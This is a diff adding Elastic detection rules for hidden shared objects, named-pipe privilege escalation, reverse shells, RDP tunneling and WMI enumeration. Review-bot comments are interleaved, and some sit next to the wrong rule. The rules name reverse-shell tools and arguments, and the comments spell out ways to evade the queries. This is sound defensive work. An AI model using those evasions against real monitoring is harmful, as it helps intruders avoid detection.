diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_110.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_110.json new file mode 100644 index 00000000000..67e0f942b7b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_110.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Creation of Hidden Shared Object File", + "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and file.extension == \"so\" and file.name : \".*.so\" and\nnot process.name == \"dockerd\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "766d3f91-3f12-448c-b65f-20123e9e9e8c_110", + "type": "security-rule" +} \ No newline at end of file 
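Review bot: The only exclusion in the query, `not process.name == "dockerd"`, keys on the process name alone, so any dropper an adversary renames to `dockerd` and runs from any path is silently exempted from a rule whose whole purpose is catching hidden artefacts. Anchoring the allow-list on the executable path instead, e.g. `not process.executable : "/usr/bin/dockerd"` (or wherever the daemon is installed in the fleet), keeps the false-positive suppression while denying the trivial bypass; `process.executable` would then need adding to `required_fields`. If the Docker exclusion exists for a known false positive, a short note naming it in the `setup` or description text would help the next maintainer judge the trade-off.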
diff --git a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_106.json b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_106.json new file mode 100644 index 00000000000..18777c7854a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_106.json 
@@ -0,0 +1,78 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via rogue named pipe impersonation. An adversary may abuse this technique by masquerading as a known named pipe and manipulating a privileged process to connect to it.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Rogue Named Pipe Impersonation", + "query": "file where host.os.type == \"windows\" and event.action : \"Pipe Created*\" and\n /* normal sysmon named pipe creation events truncate the pipe keyword */\n file.name : \"\\\\*\\\\Pipe\\\\*\"\n", + "references": [ + "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/", + "https://github.com/zcgonvh/EfsPotato", + "https://twitter.com/SBousseaden/status/1429530155291193354" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241", + "setup": "## Setup\n\nNamed Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "76ddb638-abf7-42d5-be22-4a70b0bf7241_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_9.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_9.json new file mode 100644 index 00000000000..d60105dbdc4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_9.json 
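Review bot: This rule is scored 73/high yet ships without a `note` field, so an analyst receiving the alert gets no triage guidance, while the sibling rules in this diff carry a "Resources: Investigation Guide" tag and a full "Triage and analysis" section. A short note would cover: checking the creating process image and signature from the Sysmon pipe event, looking at whether the process holds impersonation privileges, correlating with the PrintSpoofer/EfsPotato write-ups already listed under `references`, and isolating the host on confirmation. The `setup` text should also state that the `"\\*\\Pipe\\*"` pattern depends on the Sysmon `contains "pipe"` filter quoted there, since a narrower Sysmon configuration would starve the rule of events without any visible error.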
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via Suspicious Child Process", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args == \"-e\" and process.args_count >= 3 and \n not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", 
\"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "76e4d92b-61c1-4a95-ab61-5fd94179a1ee", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 9 + }, + "id": "76e4d92b-61c1-4a95-ab61-5fd94179a1ee_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_109.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_109.json new file mode 100644 index 00000000000..d0e989cba7e --- /dev/null 
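Review bot: The two stages of the sequence disagree on process names: the process stage accepts `"perl*"`, `"ruby*"` and `("awk", "gawk", "mawk", "nawk")`, but the network stage's `process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk")` only matches the bare `perl`, `ruby` and `awk`, so a reverse shell launched as `gawk`, `perl5.x` or `ruby3.x` satisfies the first stage and can never complete the sequence. Aligning the second list, `process.name : ("python*", "php*", "perl*", "ruby*", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk", "gawk", "mawk", "nawk")`, closes that gap with no change to the rule's intent; `process.parent.name` has the same exact-name entries and may warrant the same treatment. Separately, the netcat branch requires `process.args == "-e"`, so the mkfifo-based variant from the referenced cheatsheet (which uses `nc` without `-e`) is presumably out of scope and should be stated as a known limitation in the description.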
+++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_109.json 
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Desktop Tunneling Detected", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Desktop Tunneling Detected\n\nProtocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases, ranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would filter to reach their destination.\n\nAttackers may tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP connections but may be more permissive to other protocols.\n\nThis rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated with tools that perform tunneling.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine network data to determine if the host communicated with external servers using the tunnel.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key modification, etc. Inspect the host to learn which method was used and to determine a response for the case.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* RDP port and usual SSH tunneling related switches in command line */\n process.args : \"*:3389\" and\n process.args : (\"-L\", \"-P\", \"-R\", \"-pw\", \"-ssh\")\n", + "references": [ + "https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_110.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_110.json new file mode 100644 index 00000000000..94b331f3a37 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_110.json 
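Review bot: The switch clause `process.args : ("-L", "-P", "-R", "-pw", "-ssh")` only matches the flags as standalone arguments, whereas OpenSSH also accepts the forward spec attached to the flag (`-L3389:host:3389`), which satisfies `*:3389` but never the switch check, so that common form evades the rule. Adding attached patterns such as `"-L*:*", "-R*:*"` to the list covers it at little false-positive cost. Note also that `-pw` is the plink password option, so any alert matching on it carries a clear-text credential inside `process.args`; the investigation guide should warn handlers to treat the alert document as sensitive and to rotate that credential. The `_110` copy of this rule, whose hunk continues beyond this chunk, appears to carry the same query.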
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Desktop Tunneling Detected", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Desktop Tunneling Detected\n\nProtocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases, ranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would filter to reach their destination.\n\nAttackers may tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP connections but may be more permissive to other protocols.\n\nThis rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated with tools that perform tunneling.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine network data to determine if the host communicated with external servers using the tunnel.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key modification, etc. Inspect the host to learn which method was used and to determine a response for the case.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* RDP port and usual SSH tunneling related switches in command line */\n process.args : \"*:3389\" and\n process.args : (\"-L\", \"-P\", \"-R\", \"-pw\", \"-ssh\")\n", + "references": [ + "https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_110.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_110.json new file mode 100644 index 00000000000..d5fb2968f84 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_110.json 
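Review bot: The `index` list in this new version reads `logs-system.security*`, yet `related_integrations` declares only `endpoint` and `windows`, so the `system` integration that produces that data stream is not advertised as a dependency. The sibling rule 770e0c4d-b998-41e5-a62e-c7901fd7f470_110 added further down in this same diff lists `{ "package": "system", "version": "^1.6.4" }` for the identical index pattern; adding the same entry here keeps Kibana's integration check consistent with what the query actually reads. The visible part of the preceding _109 hunk shows no other difference besides the version fields, but its `index` block is outside this view, so confirm that the index change is the intended reason for the bump.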
@@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies native Windows host and network enumeration commands spawned by the Windows Management Instrumentation Provider Service (WMIPrvSE).", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration Command Spawned via WMIPrvSE", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.command_line != null and \n process.name:\n (\n \"arp.exe\",\n \"dsquery.exe\",\n \"dsget.exe\",\n \"gpresult.exe\",\n \"hostname.exe\",\n \"ipconfig.exe\",\n \"nbtstat.exe\",\n \"net.exe\",\n \"net1.exe\",\n \"netsh.exe\",\n \"netstat.exe\",\n \"nltest.exe\",\n \"ping.exe\",\n \"qprocess.exe\",\n \"quser.exe\",\n \"qwinsta.exe\",\n \"reg.exe\",\n \"sc.exe\",\n \"systeminfo.exe\",\n \"tasklist.exe\",\n \"tracert.exe\",\n \"whoami.exe\"\n ) and\n process.parent.name:\"wmiprvse.exe\" and \n not (\n process.name : \"sc.exe\" and process.args : \"RemoteRegistry\" and process.args : \"start=\" and \n process.args : (\"demand\", \"disabled\")\n ) and\n not process.args : \"tenable_mw_scan\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": 
